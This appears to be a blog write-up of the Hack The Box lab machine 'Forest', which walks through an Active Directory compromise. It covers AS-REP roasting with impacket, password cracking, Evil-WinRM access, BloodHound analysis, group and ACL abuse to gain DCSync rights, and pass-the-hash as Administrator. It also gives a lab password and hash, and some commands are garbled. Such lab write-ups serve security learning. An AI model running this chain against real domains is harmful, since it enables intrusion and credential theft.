HTB - Forest Writeup -

3 minute read

Alt Text

HTB - Forest Writeup -

This machine is rated easy difficulty and involved abusing kerberos pre-authentication to kerberoast a hash of a local service account using the impacket script GetNPUsers. Root required using bloodhound to visualize the AD environment and find a path to the domain admin, which included abusing ACL’s to get DCSync rights.

1. Recon

As usual we will start with an nmap scan of the target machine. nmap -sC -sV -oA nmap/scan Alt Text The ports of note here are:

  • 445 - SMB
  • 88 - Kerberos
  • 135 - RPC
  • 5985 - Powershell - WSMan - Remote Management

Knowing that we have rpc open we can try null authentication to get a list of user accounts rpcclient -U "" -N enumdomusers Alt Text

  • One account is of particular interest as is starts with svc which indicates it may be a service account which would mean we can abuse its special permissions relating to local groups and users
  • We can attempt to kerberoast this user to try and get a hash we can crack

2. Exploitation to User

Clone the Impacket repo and navigate into the examples folder Alt Text

Now try try attacking the svc-alfresco account:

  • If you remember from the nmap scan the domain was htb.local ./ htb.local/svc-alfresco -format john -dc-ip Alt Text Bingo! We now have the asrep hash of the user svc-alfresco and we can crack is using johntheripper
    1. First place the hash in a file called hash.txt
    2. Run john -w=/usr/share/wordlists/rockyou.txt hash.txt Alt Text
  • We now have the password of the user svc-alfresco - s3rvice

Now we can login to the powershell remote management port using a tool called Evil-WinRM evil-winrm -i -u svc-alfresco -p s3rvice Alt Text

Now that we have a shell we can also grab user.txt Alt Text

3. Priv Esc from User to Domain Admin

  • For this priv esc we will use a tool called bloodhound to visualise the Active Directory environment - follow this guide on how to set it up on your system BloodHound Wiki

To begin we need to initialize the neo4j database, you can do this by running: neo4j console Alt Text

Now that the db has been launched we can launch blood hound by running bloodhound in a terminal Alt Text

Now that bloodhound is running, we need some data to analyze, we can use the SharpHound.exe file and the upload and download capabilities of Evil-WinRM to get the files. Open a new terminal and download the SharpHound.exe file from github Alt Text

Now in your Evil-WinRM terminal type: upload SharpHound.exe Alt Text

Now we can run the file with the -c All flag to to specify we wan’t to collect all data on the AD environment .\SharpHound.exe -c All Alt Text

ls download Alt Text

We now have the bloodhound zip file on our local machine so we can open it in bloodhound by dragging it into the window Alt Text

  • You should now see that we have a lot of data in our database

Now we can run one of the pre-made queries Shortest Paths to Unconstrained Delegation Systems Alt Text There are a few things that we can see now:

  • We are part of the privileged IT group and as a result part of Account Operators can be a member Exchange Windows Permissions and Exchange Trusted Subsystem Group
  • Firstly, this means that we can add ourselves to Exchange Windows Permissions and Exchange Trusted Subsystem Group
  • This also means we can abuse ACL (Access Control List) to allow svc-alfresco to perform a DCSync attack to get the admin hash, here is a good video that explains this, Here

Let’s try adding ourselves to this group new group: net group "Exchange Windows Permissions" svc-alfresco /add Alt Text

We can also add ourselves to the Exchange Trusted Subsystem Group which will allow us to abuse ACL Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members svc-alfresco Alt Text

We can now use a tool called aclpwn to give svc-alfresco DCSync rights. There is an article here that describes it’s usage very well - ACLPWN Blog

  1. Lets install aclpwn in kali, it’s as simple as pip install aclpwn Alt Text

  2. Lets execute this command to give us DCSync permissions aclpwn -f svc-alfresco -ft user -d htb.local -s and use option 1 Alt Text

  3. Now we can use impacket’s to get the admin hash htb.local/svc-alfresco:[email protected] -dc-ip Alt Text

Bingo! We now have the admin hash

We can use this to logon using Evil-WinRM with the -H flag and grab root.txt evil-winrm -i -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 Alt Text


If you enjoyed my write up or found it useful check out my htb profile linked below: